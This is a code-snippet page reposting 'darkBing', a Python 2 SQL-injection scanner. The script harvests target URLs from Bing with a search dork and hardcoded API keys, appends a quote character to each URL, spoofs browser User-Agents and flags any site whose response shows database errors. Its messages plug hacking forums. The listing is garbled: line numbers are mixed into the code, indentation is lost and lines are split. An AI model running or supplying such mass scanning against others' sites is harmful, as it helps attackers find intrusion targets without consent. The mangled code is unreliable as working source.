代码片段darkBing SQL扫描器实例

#!/usr/bin/python

002

003	import sys, subprocess, re, Queue, urllib, urllib2, threading, random

004	from xml.dom import minidom

005	from optparse import OptionParser

006	from time import sleep

007

008	def logo():

009

010	if sys.platform == 'linux' or sys.platform == 'linux2':

011	subprocess.call("clear", shell=True)

012

logo()

013

else:

014	subprocess.call("cls", shell=True)

015

logo()

016

017	threads = []

018

urls = []

019

vuln = []

020	pager = 50

021	counter = 0

022

023	header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',

024	'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',

025	'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',

026	'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',

027	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',

028	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',

029	'Microsoft Internet Explorer/4.0b1 (Windows 95)',

030	'Opera/8.00 (Windows NT 5.1; U; en)',

031	'amaya/9.51 libwww/5.4.0',

032	'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',

033	'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',

034	'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',

035	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',

036	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',

037	'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']

038

039	sqlerrors = {'MySQL': 'error in your SQL syntax',

040	'MiscError': 'mysql_fetch',

041	'MiscError2': 'num_rows',

042	'Oracle': 'ORA-01756',

043	'JDBC_CFM': 'Error Executing Database Query',

044	'JDBC_CFM2': 'SQLServer JDBC Driver',

045	'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',

046	'MSSQL_Uqm': 'Unclosed quotation mark',

047	'MS-Access_ODBC': 'ODBC Microsoft Access Driver',

048	'MS-Access_JETdb': 'Microsoft JET Database',

049	'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',

050	'Server Error' : 'Server Error',

051	'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',

052	'Invalid Querystring' : 'Invalid Querystring',

053	'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',

054	'VBScript Runtime' : 'VBScript Runtime',

055	'ADODB.Field' : 'ADODB.Field',

056	'BOF or EOF' : 'BOF or EOF',

057	'ADODB.Command' : 'ADODB.Command',

058	'JET Database' : 'JET Database',

059	'mysql_fetch_array()' : 'mysql_fetch_array()',

060	'Syntax error' : 'Syntax error',

061	'mysql_numrows()' : 'mysql_numrows()',

062	'GetArray()' : 'GetArray()',

063	'FetchRow()' : 'FetchRow()',

064	'Input string was not in a correct format' : 'Input string was not in a correct format',

065	'Not found' : 'Not found'}

066

067	parser = OptionParser()

068

069	parser.add_option("-d", dest="dork", help="Dork for search", type="string")

070	parser.add_option("-c", dest="scan", help="Number of links to collect", type="int")

071	parser.add_option("-t", dest="nthreads", help="Number of threads", type="int")

072

073

try:

074	(options, args) = parser.parse_args()

075	if options.dork != None:

076	dork = options.dork

077

else:

078	parser.print_help()

079	sys.exit(1)

080

081	if options.scan != None:

082	pager = options.scan

083

else:

084	parser.print_help()

085	sys.exit(1)

086

087	if options.nthreads != None:

088	nthreads = options.nthreads

089

else:

090	parser.print_help()

091	sys.exit(1)

092

093	except(KeyboardInterrupt):

094	print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"

095	sys.exit(1)

096

097

098	def search(dork, page):

099	global urls

100

101	appids = ['01CDBCA91C590493EE4E91FAF83E5239FEF6ADFD', 'C2B36F733D8DCB48CE2E075CC145014122BE4724']

102	appid = random.choice(appids)

103	url = 'http://api.search.live.net/xml.aspx?Appid=%s&query=%s&sources=web&market=en-us&web.count=50&web.offset=%s' % (appid, urllib.quote(dork), str(page))

104	url_open = urllib2.urlopen(url)

105	xml = minidom.parse(url_open)

106	name = xml.getElementsByTagName('web:Url')

107	for n in name:

108	urls.append(n.childNodes[0].data)

109

110

111	class vulnScanner(threading.Thread):

112	def __init__(self, queue):

113	self.__queue = queue

114	threading.Thread.__init__(self)

115

116	def run(self):

117	global counter

118	while True:

119	url = self.__queue.get()

120	if url is None:

121

break

122

123	host = url+"'"

124

try:

125	request_web = urllib2.Request(host)

126	agent = random.choice(header)

127	request_web.add_header('User-Agent', agent)

128	source = urllib2.urlopen(request_web).read()

129	for type, eMSG in sqlerrors.items():

130	if re.search(eMSG, source):

131	if not url in vuln:

132	print "[!] w00t,w00t!: ", host,"Error: ",type, " ---> SQL Injection Found"

133	vuln.append(url)

134

135	except(KeyboardInterrupt):

136	print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"

137	sys.exit(1)

138

except:

139

pass

140

141	counter += 1

142

143	def startThreads():

144	queue = Queue.Queue(0)

145	for i in range(nthreads):

146	scan = vulnScanner(queue).start()

147

148	for i in range(len(urls)):

149	queue.put(urls[i])

150

151	for i in range(nthreads):

152	queue.put(None)

153

154	if __name__ == "__main__":

155

try:

156	print "[!] Dork: %s" % dork

157	print "[!] Sites to scan: %s" % pager

158	print "[!] Number of threads: %s" % nthreads

159

160

161	for i in range(0, (pager / 50)):

162	search(dork, 1+i)

163	print "[!] Number of collected urls: %s\\n" % len(urls)

164	startThreads()

165	while counter < len(urls):

166

sleep(1)

167	print "\\n[!] Vulnerable urls found: %s" % len(vuln)

168	print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"

169	sys.exit(1)

170	except(KeyboardInterrupt):

171	print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"

172	sys.exit(1)

文章来源： 学什么网